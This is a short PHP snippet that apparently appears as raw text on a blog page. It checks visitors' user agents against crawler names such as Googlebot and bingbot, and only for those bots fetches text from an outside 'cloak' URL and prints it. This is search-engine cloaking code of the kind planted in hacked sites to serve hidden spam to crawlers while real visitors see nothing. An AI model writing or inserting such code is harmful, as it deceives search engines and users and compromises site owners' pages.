function is_bot() { $user_agent = $_SERVER['HTTP_USER_AGENT']; $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool', 'adsense', 'slurp'); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } if (is_bot()) { $message = file_get_contents('https://tereasite.pro/cloak/easthai.txt'); echo $message; }

Leave a Reply

Your email address will not be published. Required fields are marked *